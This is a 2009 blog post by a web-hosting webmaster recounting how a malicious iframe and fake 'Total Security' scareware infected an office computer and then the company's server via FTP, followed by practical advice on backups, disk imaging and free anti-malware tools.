Well it has sure been 8 days this week! The Beatles or rather John got it right and I remember singing my heart out to it, night after night!!
This is the story...
Out of the blue it happened and even though we had all the firewalls on, pop up blockers and virus programs on our computers, these got in!!
This particular insidious piece of code has several names such as, Packed Revolt, Trojan Horse etc, but is is an 'iframe' which is placed in the code behind what you see on the page.
This code is linked to a site with a .ru (Russian registry) and it then tries to jump from that page to every computer which opens it. It is pure Malware or a Virus!.
A client suggest we look at a site as he wanted one just like it, we did and immediately we clicked on it, we got many screens overlaying each other at a very fast rate and then the screen locked!!
I knew straight away we had been violated however it was now a matter of getting it off the computer it was on before it spread right through our network and to every every site we had.
We rebooted the computer however a screen saver came up saying we had been violated and listed 20 or so virus' which we now on our system. If offer help by suggesting we buy their software called Total Security for $79US and it would clean us up.
I was still able to use the computer programs however I knew once I looked at another page on the Internet, I would infect them.
Using another computer in the office, I did searches on Google and Yahoo to find out more about this Total Security thing and found it was a scam and whilct they did infect you, if you bought their program, it would not be delivered as it did not exist and now they had your payment details as well!
I downloaded some more free programs which they suggested we use to see exactly what was on the computer and together with the ones we already use, spent 2 days just scanning and rescanning all the drives, especially the C Drive where the Windows and Documents and Setting directories are.
At first we came up with several viruses in the directories but more importantly, in the registry hiding amongst all the code. They do this so when you think you have all the files off and you reboot, they are rebuilt again from the registry, so you're virtually back where you started!
They also lodge in the areas of your drives which are set aside for when your system does an auto backup for later restoring purposes and in the areas set aside for the recycle bin. So you see they are very insidious.
I removed most of them by the second day (15 hours) and after several reboots, 3 programs showed the computer was clean.
So you think it was over... But a big 'NO' to that theory!
To set the scene..
This particular computer is the main computer used to access the admin areas of all the many web sites we host for our business clients as well as our own.
We go to our server where the web sites are using a method called 'FTP' which is the main method for up and downloading files to the websites. Everyone has a special user name and password, and it is rather like having a special key to your back door which only your closest of friends can get use on this 'back door'.
As we were way behind on our web site and hosting work we just had to bite the bullet and start doing our 'administration' business. After all as we had a clean computer, we braved it and connected to our server.
Everything went fine until we started to download some files and the warning bells rang telling us it was a virus. Yes that same virus!
To cut the story short as it goes for another 6 days..
The virus had got into our server through someone else's FTP connection and infected many of our own and client's files. This caused them to crash so anyone looking for the page just saw a coded message.
We spent those 6 days changing everyone's passwords a few times and spending hours everyday re-installing the files that had been corrupted, so the site could be online.
Even though we had the sites up, the next morning around 6am it was programmed to once again automatically change those clean files back to corrupted ones, so once again we had to spend the day re-installing from our clean back up.
Over those days, eventually one by one our sites became clean from infection and have stayed up and online.
This morning the last 2 of them showed they were not infected and were still online.
So, it looks like we are now all okay.
What is the lesson here?
In our case, we were just looking at a normal business site which itself had been infected and we got it from them. How it got onto the computer through all our protection, we can only guess it was a 'new' variety which our virus and malware programs
had not yet included in their 'definitions'.
A client had also got it from another source and after uploading his files, our server got it!!
The only thing one can do is the following..
1. Always, always, always have a backup of your files, especially the ones which are important to you. In fact it will also save you a lot of time and frustratyion and money if you have an 'image' or 'clone' copy of your complete C Drive. If it falls over for any reason, you just re-install the image or clone and you have all your programs and file from that drive up and running again.
We use a program called 'Acronis True Image'. (About $70 US) It will do both methods of backup 'images' (take up less space) and clone (needs another full drive).
A backup should be made to an external hard drive and today they as as cheap as chips.. They come in a case and just need to be plugged into your USB port. Get at least a 500 gig which will be able to take you while C drive and others if you want to back them up.
http://www.acronis.com.au/homecomputing/
2. Always have at least 2 Malware anbd Virus pr0grams running, especially for email and web browsers.
We use the very good AVG 8.5 Anti Virus and Anti Spyware program. It picked up 99.99% of our virus'.
http://free.avg.com/
We also use the this very good program which is mainly a Malware program but very good and FREE!
http://www.malwarebytes.org/mbam.php
We also have Adware for scam advertising virus.
http://www.lavasoft.com/products/ad_aware_free.php
You MUST keep up to date with these FREE programs as the ONLY the latest versions get the latest viruses!!
Make sure EVERY DAY, if you use your computer a lot on the Internet, you at least do a scan of your main C Drive by running these programs. They can run at night whilst you sleep at least once a week.
Do NOT run them at the same time.
That's it!
If you haven't scanned your box for a while, do it now and think of what programs and files you have there which would have you devastated if you lost them.
Google and other sources say over the last month (Aug/Sept 2009) the amount of people reporting these problems has multiplied by 10 and going up.
Good Luck!!!
Lonnie
Webmaster